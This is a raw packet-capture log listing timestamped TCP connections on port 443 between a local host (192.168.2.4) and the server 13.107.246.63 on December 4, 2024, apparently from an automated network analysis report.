                                                                                                                                                                                  Dec 4, 2024 11:10:29.307239056 CET4434980913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:29.307672977 CET49809443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:29.307679892 CET4434980913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:29.751132965 CET4434980913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:29.751210928 CET4434980913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:29.751262903 CET49809443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:29.751441002 CET49809443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:29.751458883 CET4434980913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:29.751472950 CET49809443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:29.751477957 CET4434980913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:29.754123926 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:29.754163980 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:29.754242897 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:29.754441977 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:29.754451036 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:29.780056000 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:29.780621052 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:29.780646086 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:29.781073093 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:29.781083107 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:29.864294052 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:29.864850998 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:29.864880085 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:29.865329981 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:29.865334988 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:30.214750051 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:30.214812040 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:30.214867115 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:30.215075970 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:30.215101004 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:30.215115070 CET49810443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:30.215120077 CET4434981013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:30.218233109 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:30.218277931 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:30.218357086 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:30.218492985 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:30.218502998 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:30.309478998 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:30.309544086 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:30.309606075 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:30.309806108 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:30.309824944 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:30.309835911 CET49811443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:30.309840918 CET4434981113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:30.312782049 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:30.312824965 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:30.312907934 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:30.313076973 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:30.313087940 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:30.701750994 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:30.702349901 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:30.702383041 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:30.702811956 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:30.702816963 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.039860964 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.040277004 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.040303946 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.040712118 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.040715933 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.146620989 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.146687031 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.146728992 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.146863937 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.146882057 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.146891117 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.146895885 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.149605989 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.149650097 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.149714947 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.149840117 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.149851084 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.484282970 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.484359980 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.484438896 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.484635115 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.484657049 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.484668970 CET49813443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.484673977 CET4434981313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.487319946 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.487368107 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.487440109 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.487587929 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.487600088 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.540033102 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.540505886 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.540518999 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.540961981 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.540966988 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.984954119 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.985029936 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.985085011 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.985246897 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.985265017 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.985276937 CET49814443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.985281944 CET4434981413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.987801075 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.987909079 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.987979889 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.988132954 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.988174915 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.998126984 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.998617887 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.998646021 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:31.999052048 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:31.999058962 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:32.027055025 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:32.027458906 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:32.027498007 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:32.027957916 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:32.027964115 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:32.444499969 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:32.444566011 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:32.444679022 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:32.444900036 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:32.444925070 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:32.444937944 CET49815443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:32.444942951 CET4434981513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:32.447726011 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:32.447776079 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:32.447880030 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:32.447993040 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:32.448005915 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:32.462266922 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:32.462315083 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:32.462462902 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:32.463892937 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:32.463917971 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:32.463949919 CET49816443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:32.463957071 CET4434981613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:32.466995955 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:32.467024088 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:32.467096090 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:32.467283010 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:32.467295885 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:32.930484056 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:32.932645082 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:32.932662010 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:32.933106899 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:32.933111906 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:33.283777952 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:33.284243107 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:33.284265995 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:33.284666061 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:33.284673929 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:33.375245094 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:33.375310898 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:33.375376940 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:33.375564098 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:33.375582933 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:33.375597000 CET49817443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:33.375602961 CET4434981713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:33.378169060 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:33.378213882 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:33.378415108 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:33.378577948 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:33.378588915 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:33.707232952 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:33.707972050 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:33.708019972 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:33.708604097 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:33.708611012 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:33.733922005 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:33.733999968 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:33.734052896 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:33.734236002 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:33.734236956 CET49818443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:33.734255075 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:33.734263897 CET4434981813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:33.737703085 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:33.737746000 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:33.737803936 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:33.738074064 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:33.738086939 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.142935991 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.143021107 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.143219948 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:34.143347979 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:34.143377066 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.143393993 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:34.143400908 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.146161079 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:34.146203995 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.146285057 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:34.146440983 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:34.146452904 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.165045023 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.168103933 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:34.168123960 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.168694973 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:34.168701887 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.184240103 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.188503027 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:34.188524961 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.189095020 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:34.189099073 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.605479002 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.605498075 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.605552912 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:34.605565071 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.605597019 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.605633974 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:34.605865002 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:34.605880976 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.605926037 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:34.605931997 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.608589888 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:34.608634949 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.608690977 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:34.608875990 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:34.608892918 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.619390011 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.619436026 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.619484901 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:34.619677067 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:34.619693995 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.619704962 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:34.619709969 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.622828960 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:34.622859955 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:34.622905970 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:34.623214960 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:34.623224020 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:35.159914017 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:35.164542913 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:35.164560080 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:35.164998055 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:35.165003061 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:35.518857002 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:35.561719894 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:35.561752081 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:35.562172890 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:35.562177896 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:35.605595112 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:35.605684042 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:35.605778933 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:35.648726940 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:35.648751020 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:35.648765087 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:35.648772955 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:35.675848961 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:35.675885916 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:35.675959110 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:35.679666996 CET49827443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:35.679682016 CET4434982713.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:35.927582979 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:35.968245029 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:35.968270063 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:35.968342066 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:35.968369007 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:35.970468044 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:35.970535040 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:35.972754955 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.107192993 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.107220888 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.108088970 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.108094931 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.108545065 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.108575106 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.108584881 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.108591080 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.118664980 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.118710995 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.118793011 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.118921995 CET49828443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.118936062 CET4434982813.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.328797102 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.329952955 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.329977036 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.330405951 CET49825443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.330410004 CET4434982513.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.405138016 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.405877113 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.405903101 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.406328917 CET49826443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.406333923 CET4434982613.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.438169003 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.438194990 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.438260078 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.438277006 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.438317060 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.438484907 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.438491106 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.438504934 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.438652039 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.438682079 CET4434982413.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.438715935 CET49824443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.440957069 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.440998077 CET4434982913.107.246.63192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:10:36.441062927 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.441207886 CET49829443192.168.2.413.107.246.63
                                                                                                                                                                                  Dec 4, 2024 11:10:36.441219091 CET4434982913.107.246.63192.168.2.4
